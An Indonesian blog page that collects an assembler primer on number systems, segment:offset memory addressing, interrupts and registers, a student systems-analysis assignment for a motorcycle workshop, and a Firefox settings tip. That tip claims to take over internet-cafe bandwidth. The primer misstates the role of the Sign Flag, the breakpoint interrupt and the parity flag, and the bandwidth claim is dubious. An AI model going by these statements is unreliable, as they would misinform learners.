Senin, 19 Oktober 2009

PENGALAMATAN MEMORY

Dasar teory.


BILANGAN

1.1. BERBAGAI JENIS BILANGAN

Didalam pemrograman dengan bahasa assembler, bisa digunakan berbagai jenis bilangan. Jenis bilangan yang bisa digunakan, yaitu: Bilangan biner, oktaf, desimal dan hexadesimal. Pemahaman terhadap jenis-jenis bilangan ini adalah penting, karena akan sangat membantu kita dalam pemrograman yang sesungguhnya.

1.1.1. BILANGAN BINER

Sebenarnya semua bilangan, data maupun program itu sendiri akan diterjemahkan oleh komputer ke dalam bentuk biner. Jadi pendefinisisan data dengan jenis bilangan apapun(Desimal, oktaf dan hexadesimal) akan selalu diterjemahkan oleh komputer ke dalam bentuk biner.

Bilangan biner adalah bilangan yang hanya terdiri atas 2 kemungkinan(Berbasis dua), yaitu 0 dan 1. Karena berbasis 2, maka pengkorversian ke dalam bentuk desimal adalah dengan mengalikan suku ke-N dengan 2N. Contohnya: bilangan biner 01112 = (0 X 23) + (1 X 22) + (1 X 21) + (1 X 20) = 710.

1.1.2. BILANGAN DESIMAL

Tentunya jenis bilangan ini sudah tidak asing lagi bagi kita semua. Bilangan Desimal adalah jenis bilangan yang paling banyak dipakai dalam kehidupan sehari-hari, sehingga kebanyakan orang sudah akrab dengannya.

Bilangan desimal adalah bilangan yang terdiri atas 10 buah angka(Berbasis 10), yaitu angka 0-9. Dengan basis sepuluh ini maka suatu angka dapat dijabarkan dengan perpangkatan sepuluh. Misalkan pada angka 12310 = (1 X 102) + (2 X 101) + (1 X 100).

1.1.3. BILANGAN OKTAL

Bilangan oktal adalah bilangan dengan basis 8, artinya angka yang dipakai hanyalah antara 0-7. Sama halnya dengan jenis bilangan yang lain, suatu bilangan oktal dapat dikonversikan dalam bentuk desimal dengan mengalikan suku ke-N dengan 8N. Contohnya bilangan 128 = (1 X 81) + (2 X 80) = 1010.5

1.1.4. BILANGAN HEXADESIMAL

Bilangan hexadesimal merupakan bilangan yang berbasis 16. Dengan angka yang digunakan berupa:

0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F.

Dalam pemrograman assembler, jenis bilangan ini boleh dikatakan yang paling banyak digunakan. Hal ini dikarenakan mudahnya pengkonversian bilangan ini dengan bilangan yang lain, terutama dengan bilangan biner dan desimal. Karena berbasis 16, maka 1 angka pada hexadesimal akan menggunakan 4 bit.

1.2. BILANGAN BERTANDA DAN TIDAK

Pada assembler bilangan-bilangan dibedakan lagi menjadi 2, yaitu bilangan bertanda dan tidak. Bilangan bertanda adalah bilangan yang mempunyai arti plus(+) dan minus(-), misalkan angka 17 dan -17. Pada bilangan tidak bertanda, angka negatif(yang mengandung tanda '-') tidaklah dikenal. Jadi angka -17 tidak akan akan dikenali sebagai angka -17, tetapi sebagai angka lain.

Kapan suatu bilangan perlakukan sebagai bilangan bertanda dan tidak? Assembler akan selalu melihat pada Sign Flag, bila pada flag ini bernilai 0, maka bilangan akan diperlakukan sebagai bilangan tidak bertanda, sebaliknya jika flag ini bernilai 1, maka bilangan akan diperlakukan sebagai bilangan bertanda.

Pada bilangan bertanda bit terakhir (bit ke 16) digunakan sebagai tanda plus(+) atau minus(-). Jika pada bit terakhir bernilai 1 artinya bilangan tersebut adalah bilangan negatif, sebaliknya jika bit terakhir bernilai 0, artinya bilangan tersebut adalah bilangan positif(Gambar 1.1).

+--------------------------------------------+

>>>> Bilangan <<<<

+------------+---------------+---------------+

Biner Tidak Bertanda Bertanda

+------------+---------------+---------------+

0000 0101 + 5 + 5

0000 0100 + 4 + 4

0000 0011 + 3 + 3

0000 0010 + 2 + 2

0000 0001 + 1 + 1

0000 0000 0 0

1111 1111 + 255 - 1

1111 1110 + 254 - 2

1111 1101 + 253 - 3

1111 1100 + 252 - 4

1111 1011 + 251 - 5

1111 1010 + 250 - 6

+------------+---------------+---------------+

Gambar 1.1. Bilangan Bertanda dan Tidak

M E M O R I

Memori dengan komputer memiliki hubungan yang tak dapat dipisahkan, karena setiap komputer memerlukan memori sebagai tempat kerjanya. Memori ini dapat berfungsi untuk memuat program dan juga sebagai tempat untuk menampung hasil proses.

Yang perlu kita perhatikan bahwa memori untuk menyimpan program maupun hasil dari pekerjaan bersifat volatile yang berarti bahwa data yang disimpan cuma sebatas adanya aliran listrik. Jadi bila listrik mati maka hilang pulalah semua data yang ada di dalamnya. Hal ini mengakibatkan diperlukannya media penyimpan kedua yang biasanya berupa disket maupun hard disk.

2.1. Microprocessor

Pada IBM-PC terdapat suatu bagian penting yang disebut microprocessor atau yang sering disebut processor saja. Processor ini berfungsi untuk menangani keseluruhan dari kerja komputer kita. Pada processor inilah segala hal yang berhubungan dengan kerja komputer diatur dan dibagi prioritasnya dengan baik agar tidak terjadi kesalahan yang kemudian akan menyebabkan kacaunya informasi yang diperoleh.

Lama kelamaan tugas komputer tentu saja makin bertambah baik dari segi kuantitas maupun kerumitannya. Sejalan dengan itu processor juga makin dikembangkan. Processor yang baru sebenarnya hanyalah perbaikan dan pengembangan dari yang versi lama sehingga semua instruksi yang berlaku di processor lama dapat pula dikerjakan oleh yang baru dengan tentu saja beberapa keunggulan.

Adapun processor yang kini banyak beredar di pasaran :

- 8088 & 8086 :

Ini merupakan processor IBM-PC yang pertama sekali atau yang sering disebut XT. Processor 8088 menggunakan jalur bus data 8 bit sedangkan 8086 menggunakan 16 bit. Perbedaan jalur bus ini menyebabkan perbedaan jumlah data yang dikirim pada satu saat dan secara langsung mengakibatkan speed 8086 berada di atas 8088. Baik 8088 maupun 8086 mampu mengalamatkan memori hingga 1 MB.

- 80286 :

Versi pengembangan dari 8086. Pada 80286 ini beberapa instruksi baru ditambahkan. Selain itu dengan jalur bus yang sama dengan 8086, 80286 dirancang mempunyai speed di atas 8086. Selain itu 80286 dapat bekerja pada 2 8

mode yaitu mode real dan protected.

Mode real pada 80286 dapat beroperasi sama seperti 8088 dan 8086 hanya terdapat perbedaan dalam hal speed. Mode real ini dimaksudkan agar semua software yang dapat dioperasikan pada 8088/8086 dapat pula dioperasikan dengan baik di 80286. Pada mode protected 80286 mampu mengalamatkan sampai 16 MB memori.

- 80386 :

Processor 80386 merupakan sesuatu yang sangat baru dibanding 80286 sebab bus data yang digunakan di sini sudah 32 bit sehingga speednya juga jauh di atas 80286. Selain itu pada 80386 ditambahkan pula sebuah mode pemrograman baru yaitu mode virtual. Pada mode virtual ini 80386 mampu mengalamatkan sampai 4 GB memori. Sama seperti 80286, mode real dimaksudkan untuk kompatibilitas

dengan 8088/8086 dan mode protected untuk menjaga kompatibilitas dengan 80286.

2.2. Organisasi Memori Pada PC

Memori yang ada pada komputer perlu diatur sedemikian rupa sehingga mudah dalam pengaksesannya. Oleh sebab itu dikembangkanlah suatu metode yang efektif dalam pengorganisasiannya. Pada bagian ini akan dibahas mengenai pengorganisasian memori ini.

2.3. Pembagian Memori

Memori komputer terbagi atas 16 blok dengan fungsi-fungsi khusus yang sebagian besar adalah sebagai RAM (Random Access Memory) yang berfungsi sebagai penyimpan bagi hasil pengolahan pada komputer itu sendiri. Untuk lebih jelasnya diberikan pembagian fungsi pada blok memori ini secara kasar pada gambar 2.1.

---------------------------------------------------

block fungsi

---------------------------------------------------

0 RAM

1 RAM

2 RAM

3 RAM

4 RAM

5 RAM

6 RAM

7 RAM

8 RAM

9 RAM

A EXTENDED VIDEO MEMORI

B EXTENDED VIDEO MEMORY

C PERLUASAN ROM

D FUNGSI LAIN

E FUNGSI LAIN

F BIOS & BASIC

---------------------------------------------------

Gambar 2.1. Pembagian blok memori IBM PC

________________________________________

2.4. Pengalamatan Memori Dengan Segment Offset

Sudah kita bahas bersama bahwa baik 8086 maupun mode real 80286 dapat mengalamatkan sampai 1 MB memori. Tetapi sebenarnya baik 8086 maupun 80286 adalah procesor 16 bit. Banyaknya memori yang dapat dicatat atau dialamatkan oleh procesor 16 bit adalah maksimal 216 byte (=64 KB). Jadi bagaimana 8086 dan mode real 80286 mampu mengalamatkan sampai 1 MB memori ?.

Hal ini dapat dimungkinkan dengan adanya pengalamatan yang menggunakan sistem 20 bit walaupun sebenarnya procesor itu hanya 16 bit. Dengan cara ini dapat dialamatkan 220 byte (=1 MB) memori. Tetapi masih tetap ada satu kendala dalam pengalamatan 20 bit ini. Yaitu bahwa sesuai dengan tipenya procesor ini hanya mampu mengakses 16 bit data pada satu kali akses time. Sebagai pemecahannya dikembangkanlah suatu metode pengalamatan 20 bit yang dimasukkan ke dalam format 16 bit.

Pada metode pengalamatan ini baik 8086 maupun mode real 80286 membagi ruang memori ke dalam segmen-segmen di mana besar 1 segmen adalah 64 KB (=216 byte). Jadi pada segmen 0000h(Tanda "h" menunjukkan hexadesimal) terdapat 64 KB data, demikian pula dengan segmen 0001h dan seterusnya.

Sekarang bagaimana caranya agar setiap data yang tersimpan dalam satu segmen yang besarnya 64 KB itu dapat diakses secara individual. Cara yang dikembangkan adalah dengan membagi-bagi setiap segmen menjadi bagian-bagian yang disebut offset. Dalam satu segmen terdapat 216 offset yang diberi nomor dari 0000h sampai FFFFh. Nomor offset selalu diukur relatif dari awal suatu segmen.

Sekarang kita lihat bagaimana sebenarnya letak suatu segmen dalam memori komputer kita. Segmen 0000h berawal dari lokasi memori 0 hingga 65535 ( 64 KB ). Segmen 0001h berawal dari lokasi memori 16 (0010h) hingga 65551 (65535 + 16). Segmen 0002h berawal dari lokasi 32 hingga 65567. Demikian seterusnya. Kita lihat bahwa sistem penempatan segmen semacam ini akan menyebabkan ter-

Segmen Offset

0000 +--------------------+0000

0001 +-----+-------------+0000 0016

0002+-----+------------+0000 0016 0032

0003+-----+-----------+0000 0016 0032 0048

: : :

: : : :

:

+------+65535

:

: +------+65535

+------+65535

+-----------------+65535

Gambar 2.2. Peta Overlapping Segmen

jadinya overlapping (tumpang-tindih) di mana lokasi offset 0010h bagi segmen 0000h akan merupakan offset 0000h bagi segmen 0001h. Demikian pula offset 0011h bagi segmen 0000h akan merupakan offset 0001h bagi segmen 0001h. Dalam pembahasan selanjutnya akan kita lihat bahwa ada banyak nilai segmen:offset yang dapat digunakan untuk menyatakan suatu alamat memori tertentu disebabkan adanya overlapping ini. Untuk lebih jelasnya dapat kita lihat pada gambar 2.2.

2.5. Konversi Alamat

Alamat yang menggunakan sistem segmen:offset ini disebut sebagai alamat relatif karena sifat offset yang relatif terhadap segmen. Sedangkan alamat memori yang sebenarnya disebut alamat absolut. Berikut kita lihat cara pengkonversian alamat relatif ke absolut.

Pengkonversian dapat dilakukan dengan menggeser nilai segmen 4 bit ke kiri dan kemudian dijumlahkan dengan nilai offset. Atau yang lebih sederhana adalah dengan mengalikan nilai segmen dengan 24 (=10h) dan kemudian dijumlahkan dengan nilai offset. Cara ini dikembangkan dari besarnya selisih segmen yang satu dengan yang berikutnya yang sebesar 16 bit (=10h).

Alamat relatif : 1357h:2468h 1356h:2478h

13570 13560

2468 2478

------- -------

Alamat absolut : 159D8h 159D8h

Pada kedua contoh di atas terlihat jelas alamat relatif 1357h:2468h sebenarnya menunjukkan lokasi yang sama dalam memori dengan alamat relatif 1356h:2478h yang disebut overlapping.

Alamat yang overlapping ini menyebabkan sebuah alamat absolute dapat dinyatakan dengan alamat segmen:offset yang bervariasi sebanyak 2 pangkat 12 atau sebanyak 4096 variasi.

Variasi untuk alamat absolute :

0 - 15 dapat dinyatakan dengan 1 variasi

16 - 31 dapat dinyatakan dengan 2 variasi

32 - 48 dapat dinyatakan dengan 3 variasi

:

:

65520 keatas dapat dinyatakan dengan 4096 variasi.

BAB III

INTERRUPT

3.1. PENGERTIAN INTERRUPT

Interupsi adalah suatu permintaan khusus kepada mikroposesor untuk melakukan sesuatu. Bila terjadi interupsi, maka komputer akan menghentikan dahulu apa yang sedang dikerjakannya dan melakukan apa yang diminta oleh yang menginterupsi.

Pada IBM PC dan kompatibelnya disediakan 256 buah interupsi yang diberi nomor 0 sampai 255. Nomor interupsi 0 sampai 1Fh disediakan oleh ROM BIOS, yaitu suatu IC didalam komputer yang mengatur operasi dasar komputer. Jadi bila terjadi interupsi dengan nomor 0-1Fh, maka secara default komputer akan beralih menuju ROM BIOS dan melaksanakan program yang terdapat disana. Program yang melayani suatu interupsi dinamakan Interrupt Handler.

3.2. VEKTOR INTERUPSI

Setiap interrupt akan mengeksekusi interrupt handlernya masing-masing berdasarkan nomornya. Sedangkan alamat dari masing- masing interupt handler tercatat di memori dalam bentuk array yang besar elemennya masing-masing 4 byte. Keempat byte ini dibagi lagi yaitu 2 byte pertama berisi kode offset sedangkan 2 byte berikutnya berisi kode segmen dari alamat interupt handler yang bersangkutan. Jadi besarnya array itu adalah 256 elemen dengan ukuran elemen masing-masing 4 byte. Total keseluruhan memori yang dipakai adalah sebesar 1024 byte (256 x 4 = 1024) atau 1 KB dan disimpan dalam lokasi memori absolut 0000h sampai 3FFh. Array sebesar 1 KB ini disebut Interupt Vector Table (Table Vektor Interupsi). Nilai-nilai yang terkandung pada Interupt Vector Table ini tidak akan sama di satu komputer dengan yang lainnya.

Interupt yang berjumlah 256 buah ini dibagi lagi ke dalam 2 macam yaitu:

- Interupt 00h - 1Fh (0 - 31) adalah interrupt BIOS dan standar di semua komputer baik yang menggunakan sistem operasi DOS atau bukan. Lokasi Interupt Vector Table-nya ada di alamat absolut 0000h-007Fh.

- Interupt 20h - FFh (32 - 255) adalah interrupt DOS. Interrupt ini hanya ada pada komputer yang menggunakan sistem operasi DOS dan Interupt Handler-nya di-load ke memori oleh DOS pada saat DOS digunakan. Lokasi Interupt Vector Table-nya ada di alamat absolut 07Fh-3FFh.

+---------------------------------------------------------------+

Nomor Nama Nomor Nama

Interupt Interupt Interupt Interupt

+---------------------------------------------------------------+

*00h Divide By Zero 10h Video Service

*01h Single Step 11h Equipment Check

*02h Non MaskableInt(NMI) 12h Memory Size

*03h Break point 13h Disk Service

04h Arithmatic Overflow 14h Communication (RS-232)

05h Print Screen 15h Cassette Service

06h Reserved 16h Keyboard Service

07h Reserved 17h Printer Service

08h Clock Tick(Timer) 18h ROM Basic

09h Keyboard 19h Bootstrap Loader

0Ah I/O Channel Action 1Ah BIOS time & date

0Bh COM 1 (serial 1) 1Bh Control Break

0Ch COM 2 (serial 2) 1Ch Timer Tick

0Dh Fixed Disk 1Dh Video Initialization

0Eh Diskette 1Eh Disk Parameters

0Fh LPT 1 (Parallel 1) 1Fh Graphics Char

+---------------------------------------------------------------+

Gambar 3.1. BIOS Interrupt

* Interrupt ini telah dipastikan kegunaannya oleh sistem untuk keperluan yang khusus , tidak boleh dirubah oleh pemrogram seperti yang lainnya.

- DEVIDE BY ZERO : Jika terjadi pembagian dengan nol maka proses akan segera dihentikan.

- SINGLE STEP : Untuk melaksanakan / mengeksekusi intruksi satu persatu.

- NMI : Pelayanan terhadap NMI (Non Maskable Interrupt) yaitu interupsi yang tak dapat dicegah.

- BREAK POINT : Jika suatu program menyebabkan overflow flag menjadi 1 maka interrupt ini akan melayani pencegahannya dan memberi tanda error.

+-------------------------------------------+

Nomor Nama Interrupt

Interrupt

+-------------------------------------------+

20h Terminate Program

21h DOS Function Services

22h Terminate Code

23h Ctrl-Break Code

24h Critical Error Handler

25h Absolute Disk Read

26h Absolute Disk Write

27h Terminate But Stay Resident

+-------------------------------------------+

Gambar 3.2. DOS Interrupt

Didalam pemrograman dengan bahasa assembler kita akan banyak sekali menggunakan interupsi untuk menyelesaikan suatu tugas.

REGISTER

4.1.PENGERTIAN REGISTER

Dalam pemrograman dengan bahasa Assembly, mau tidak mau anda harus berhubungan dengan apa yang dinamakan sebagai Register. Lalu apakah yang dimaksudkan dengan register itu sebenarnya ?.

Register merupakan sebagian memori dari mikroprosesor yang dapat diakses dengan kecepatan yang sangat tinggi. Dalam melakukan pekerjaannya mikroprosesor selalu menggunakan register-register sebagai perantaranya, jadi register dapat diibaratkan sebagai kaki dan tangannya mikroprosesor.

4.2.JENIS-JENIS REGISTER

Register yang digunakan oleh mikroprosesor dibagi menjadi 5 bagian dengan tugasnya yang berbeda-beda pula, yaitu :

4.2.1. Segmen Register.

Register yang termasuk dalam kelompok ini terdiri atas register CS,DS,ES dan SS yang masing-masingnya merupakan register 16 bit. Register-register dalam kelompok ini secara umum digunakan untuk menunjukkan alamat dari suatu segmen.

Register CS(Code Segment) digunakan untuk menunjukkan tempat dari segmen yang sedang aktif, sedangkan register SS(Stack Segment) menunjukkan letak dari segmen yang digunakan oleh stack. Kedua register ini sebaiknya tidak sembarang diubah karena akan menyebabkan kekacauan pada program anda nantinya.

Register DS(Data Segment) biasanya digunakan untuk menunjukkan tempat segmen dimana data-data pada program disimpan. Umumnya isi dari register ini tidak perlu diubah kecuali pada program residen. Register ES(Extra Segment), sesuai dengan namanya adalah suatu register bonus yang tidak mempunyai suatu tugas khusus. Register ES ini biasanya digunakan untuk menunjukkan suatu alamat di memory, misalkan alamat memory video.

Pada prosesor 80386 terdapat tambahan register segment 16 bit, yaitu FS dan GS.

4.2.2. Pointer dan Index Register.

Register yang termasuk dalam kelompok ini adalah register SP,BP,SI dan DI yang masing-masing terdiri atas 16 bit. Register- register dalam kelompok 16

ini secara umum digunakan sebagai penunjuk atau pointer terhadap suatu lokasi di memory.

Register SP(Stack Pointer) yang berpasangan dengan register segment SS(SS:SP) digunakan untuk mununjukkan alamat dari stack, sedangkan register BP(Base Pointer)yang berpasangan dengan register SS(SS:BP) mencatat suatu alamat di memory tempat data.

Register SI(Source Index) dan register DI(Destination Index) biasanya digunakan pada operasi string dengan mengakses secara langsung pada alamat di memory yang ditunjukkan oleh kedua register ini.

Pada prosesor 80386 terdapat tambahan register 32 bit, yaitu ESP,EBP,ESI dan EDI.

4.2.3. General Purpose Register.

Register yang termasuk dalam kelompok ini adalah register AX,BX,CX dan DX yang masing-masing terdiri atas 16 bit. Register- register 16 bit dari kelompok ini mempunyai suatu ciri khas, yaitu dapat dipisah menjadi 2 bagian dimana masing-masing bagian terdiri atas 8 bit, seperti pada gambar 4.1. Akhiran H menunjukkan High sedangkan akhiran L menunjukkan Low.

+ A X + + B X + + C X + + D X +

+-+--+--+-+ +-+--+--+-+ +-+--+--+-+ +-+--+--+-+

AH AL BH BL CH CL DH DL

+----+----+ +----+----+ +----+----+ +----+----+

Gambar 4.1. General purpose Register

________________________________________

Secara umum register-register dalam kelompok ini dapat digunakan untuk berbagai keperluan, walaupun demikian ada pula penggunaan khusus dari masing-masing register ini yaitu :

Register AX, secara khusus digunakan pada operasi aritmatika terutama dalam operasi pembagian dan pengurangan.

Register BX, biasanya digunakan untuk menunjukkan suatu alamat offset dari suatu segmen.

Register CX, digunakan secara khusus pada operasi looping dimana register ini menentukan berapa banyaknya looping yang akan terjadi.

Register DX, digunakan untuk menampung sisa hasil pembagian 16 bit.

Pada prosesor 80386 terdapat tambahan register 32 bit, yaitu EAX,EBX,ECX dan EDX.

4.2.4. Index Pointer Register

Register IP berpasangan dengan CS(CS:IP) menunjukkan alamat dimemory tempat dari intruksi(perintah) selanjutnya yang akan dieksekusi. Register IP juga merupakan register 16 bit. Pada prosesor 80386 digunakan register EIP yang merupakan register 32 bit.

4.2.5. Flags Register.

Sesuai dengan namanya Flags(Bendera) register ini menunjukkan kondisi dari suatu keadaan<>. Karena setiap keadaan dapat digunakan 1 bit saja, maka sesuai dengan jumlah bitnya, Flags register ini mampu memcatat sampai 16 keadaan. Adapun flag yang terdapat pada mikroprosesor 8088 keatas adalah :

- OF . Jika terjadi OverFlow pada operasi aritmatika, bit ini akan bernilai 1.

- SF . Jika digunakan bilangan bertanda bit ini akan bernilai 1

- ZF . Jika hasil operasi menghasilkan nol, bit ini akan bernilai 1.

- CF . Jika terjadi borrow pada operasi pengurangan atau carry pada penjumlahan, bit ini akan

bernilai 1.

0F 0E 0D 0C 0B 0A 09 08 07 06 05 04 03 02 01 00

+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+

NT IOPLOFDFIFTFSFZF AF PF CF

+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+

Gambar 4.2. Susunan Flags Register 8088

- PF . Digunakan untuk menunjukkan paritas bilangan. Bit ini akan bernilai 1 bila bilangan yang

dihasilkan merupakan bilangan genap.

- DF . Digunakan pada operasi string untuk menunjukkan arah proses.

- IF . CPU akan mengabaikan interupsi yang terjadi jika bit ini 0.

- TF . Digunakan terutama untuk Debugging, dengan operasi step by step.

- AF . Digunakan oleh operasi BCD, seperti pada perintah AAA.

- NT . Digunakan pada prosesor 80286 dan 80386 untuk menjaga jalannya interupsi yang

terjadi secara beruntun.

- IOPL . Flag ini terdiri atas 2 bit dan digunakan pada prosesor 80286 dan 80386 untuk mode proteksi.

Adapun susunan dari masing-masing flag didalam flags register dapat anda lihat pada gambar 4.2. Pada prosesor 80286 dan 80386 keatas terdapat beberapa tambahan pada flags register, yaitu :

- PE . Digunakan untuk mengaktifkan mode proteksi. flag ini akan bernilai 1 pada mode proteksi dan 0 pada mode real.

- MP . Digunakan bersama flag TS untuk menangani terjadinya intruksi WAIT.

- EM . Flag ini digunakan untuk mensimulasikan coprosesor 80287 atau 80387.

- TS . Flag ini tersedia pada 80286 keatas.

- ET . Flag ini digunakan untuk menentukan jenis coprosesor 80287 atau 80387.

- RF . Register ini hanya terdapat pada prosesor 80386 keatas.

- VF . Bila flag ini bernilai 1 pada saat mode proteksi,

mikroprosesor akan memungkinkan dijalankannya aplikasi mode real pada mode proteksi. Register ini hanya terdapat pada 80386 keatas.


Disadur Dari forumbebas.com

PREVIEW TUGAS DAPAT DILIHAT DIBAWAH INI, HOST PDF PADA SCRIBD.COM
Faisal Assembler

Senin, 01 Juni 2009

TUGAS ANALISA SISTEM INFORMASI












BAB I
PENDAHULUAN


LATAR BELAKANG MASALAH

Di era globalisasi seperti saat ini tidak sedikit orang yang mengenal computer tapi sedikit orang yang bisa menerapkan didalam kehidupan sehari-hari dan dalam bisnis suatu perusahaan kecil dan menengah. Disini kami akan membahas bagaimana cara penggunaan suatu sistem informasi didalam bengkel kendaraan roda 2. kami lihat di kota Magelang belum ada bengkel yang manggunakan sistem informasi. Kami disini akan mencoba membuat suatu sistem informasi pada bengkel kendaraan roda 2 misalnya tentang keluar masuknya suku cadang(sparepart),penggunaan oli/jual beli oli,banyaknya orang yang menyervise kendaraan dalam waktu 1 hari bahkan sampai 1 bulan dll.
Suatu perusahaan kecil atau menengah akan terasa lebih praktis dan keadaan suatu perusahaan dapat terkontrol dengan baik karena dengan adanya sistem informasi. Setiap perusahaan juga bisa dibuat sistem informasi tepi tidak semua perusahaan juga tahu bagaimana praktisnya atau leih terinci suatu kegiatan dalam suatu perusahaan tersebut. Disini kami tigak akan membuat sistem informasi secara rumit tetapi disini kami akan membuat sistem informasi perusahaan dengan simple dan mudah dimengerti oleh orang-orang awam. Jasa bengkel kendaraan roda 2 sudah menjamur dikota magelang jadi kami membuat sistem informasi yang bisa dimengerti oleh orang-orang yang bisa computer atau hanya orang-orang IT saja.

PERUMUSAN MASALAH

Harapan kami setelah penerapan sistem inforamsi tersebutsupaya jasa bengkel kendaraan roda 2 bisa terencana/dapat dibca oleh orang lain secara mudah. Meskipun sistemnya terkomputerisasi selain harapan diatas adalah mengajak masyarakat atau orang awam yang belum mengenal sistem informasi bisa mengenalnya dengan cepat. Apalagi ini suatu perusahaan bengkel kendaraan roda 2 yang telah memiliki nama atau merupakan salah 1 dealer resmi. Dengan adanya sistem informasi ini suatu perusahaan bisa mengerti tata cara kerja yang baik dan benar.


TUJUAN DAN MANFAAT

Tujuan dibuatnya sistem informasi ini adalah menghasilkan sistem informasi yang dapat membantu cara kerja perusahaan.Manfaat dari pembuatan sistem informasi adalah mempermudah dalam pengelolahan administrasi dan pengelolahan data-data yang ada.
BAB II
PENGUMPULAN DAN PENGOLAHAN DATA
Didalam pengumpulan dan pengolahan data terdapat beberapa gambaran :
1. DFD Context
Diagram ini hanya terdiri dari satu proses eksternal entity yang dibutuhkan tanpa simpanan (data store).
Pada sistem ini dua kesatuan luar yang disebut (eksternal entity) yaitu Bengkel Kendaraan Roda 2. Sesuai dengan defisiensinya kesatuan luar tercipta tujuan sistem. Bengkel dijadikan kesatuan luar karena bengkel didalam sistem ini merupakan elemen dari sistem yang memberikan masukan sebagai sumber sistem ini.
2. DFD LEVEL 0
DFD Level 0 merupakan proses dari Level Context,kesatuan luar (eksternal entity) tetap.
Proses dimulai dari konsumen datang ke Bengkel dan mendaftarkan diri sebagai pelanggan apabila kita sudah menjadi member kita tinggal adminstrasi lainnya dan konsumen harus menyerahkan data kerusakan kendaraan tersebut atau menyerahkan data apa yang perlu diservice. Sesudah konsumen menyerahkan data-data yang terdiri dari data konsumen dan data kerusakan atau data kendaraan yang akan diservice, pelanggan melakukan transaksi-transaksi lain dan sesudah itu dilakukan pengecekan kendaraan dan montir mulai melakukan service. Setelah service dilakukan pihak bengkel melakukan pengecekan biaya service yang dilakukan di bagian keuangan atau kasir dan kasir menyerahkan data biaya ke konsumen.
3. ERD (Entity Relationship Data)
Keterangan : Disini konsumen melakukan jasa service bengkel kepada montir, konsumen bisa memilih montir mana yang bisa memperbaiki kerusakan atau bagian kendaraan mana yang harus diservice sesuai dengan keahlian montir tersebut dan sesudah itu montir melakukan cek biaya sesuai dengan kerusakan atau bagiaan yang diservice.4. Database Relationship
NORMALISASI
1. Pengertian Normalisasi
Normalisasi ialah suatu teknik untuk mengorganisasi data kedalam tabel-tabel untuk memenuhi kebutuhan pemakai didalam suatu organisasi.
2. Tujuan Normalisasi
Untuk menghilangkan kerangkapan data
Untuk mengurangi kompleksitas
Untuk mempermudah pemodifikasian data.
3. Tahapan-tahapan Normalisasi
Tahapan Normalisasi
Bentuk Tidak Normal
Menghilangkan perulangan group
Bentuk Normal Pertama ( 1NF )
Menghilangkan ketergantungan sebagian
Bentuk Normal Kedua ( 2NF )
Menghilangkan ketergantungan transitif
Bentuk Normal Ketiga ( 3NF )
Menghilangkan anomali-anomali hasil dari ketergantungan fungsional.
Bentuk Normal Boyce-Codd ( BCNF )
Ketergantungan Fungsionnal
Atribut Y pada relasi R dikatakan tergantung fungsional pada atribut X ( R.XR.Y ), jika dan hanya jika setiap nilai X pada relasi R mempunyai tepat satu nilai Y pada R.
Ketergantungan fungsionalnya adalah :
No-pemNa-pem
Ketergantungan Fungsional penuh
Atribut Y pada relasi R dikatakan tergantung fungsional pada atribut X pada relasi R, jika Y tidak tergantung pada subset dari X (bila X adalah key gabungan).
Ketergantungan fungsional :
Ketergantungan Transitif
Atribut Z pada relasi R dikatakan tergantung transitif pada atribut X, jika atribut Y tergantung pada atribut X pada relasi R dan atribut Z tergantung pada atribut Y pada relasi R. (XY, YZ, maka XZ ).
Ketergantungan transitif :
4. Bentuk Normalisasi
Bentuk Normal Kesatu ( 1NF )
Suatu relasi dikatakan sudah memenuhi bentuk normal kesatu bila setiap data bersifat atomik yaitu setiap irisan baris dan kolom hanya mempunyai satu nilai data.
Bentuk Normal Kedua ( 2NF )
Suatu relasi dikatakan sudah memnuhi bentuk kedua bila relasi tersebut sudah memenuhi bentuk normal kesatu, dan atribut key sudah tergantung penuh terhadap keynya.
Bentuk Normal Kedua ( 3NF )
Suatu relasi dikatakan sudah memnuhi bentuk ketiga bila relasi tersebut sudah memenuhi bentuk normal kedua, dan atribut yang bukan key tidak tergantung transitif terhadap keynya.
Normalisasi Database Service Motor
Asumsi-asumsi
Konsumen ( pengguna jasa service ) motornya dapat diservice lebih dari satu montir berdasarkan jenis kerusakan motornya.
Montir dapat menservis lebih dari satu motor konsumen.
Satu montir hanya menangani kerusakan yang sesuai dengan keahlianya

tugas ini juga di muat di bloggernya m fatkhul faizun blogger faizun


tugas ini juga di muat di bloggernya nasir mansurblogger nasir

Sabtu, 23 Mei 2009

memonopoli bandwith dengan mozilla

MEMONOPOLI BANDWIDTH DENGAN BROWSER MOZILLA FIREFOX
    
  
Pernah gak temen2 ngerasain pas lagi warnet yang walaupun sepi user tapi buat browsing ttp pelan, download juga pelan bgt... itu karena tiap bilik/room udah di batasi bitrate n bandwithnya... nah sekarang masalah itu sudah bs teratasi... caranya :
1). Buka Browser Mozilla Firefox?
2). Pada Address Bar Ketik :  ABOUT:CONFIG
3). Cari string di bawah ini : ( pastikan semua srting dibawah "TRUE")
contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih "Toggle"
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False
4). buat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan NEW>>INTEGER
5). Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6). Kemudian REFRESH atau Tekan F5
7). Pada Address Bar Ketik : ABOUT:BLANK
. Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
9). Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan
10).Kemudian Tekan OK Lalu REFRESH ( F5 )
11).Masuk Ke Link Ini :
https://addons.mozilla.org/extensions/moreinfo.php?applicationfiltered=firefox&id=125
atau :
https://addons.mozilla.org/extensions/moreinfo.php?id=125&applicationfiltered=firefox
12).Download Software SwitchProxy Tool Versi 1.3.4
13).Setelah Selesai Jangan Tekan Tombol UPDATE
14).Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
15).Tutup Semua Browser Mozilla FireFox,
16).Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi
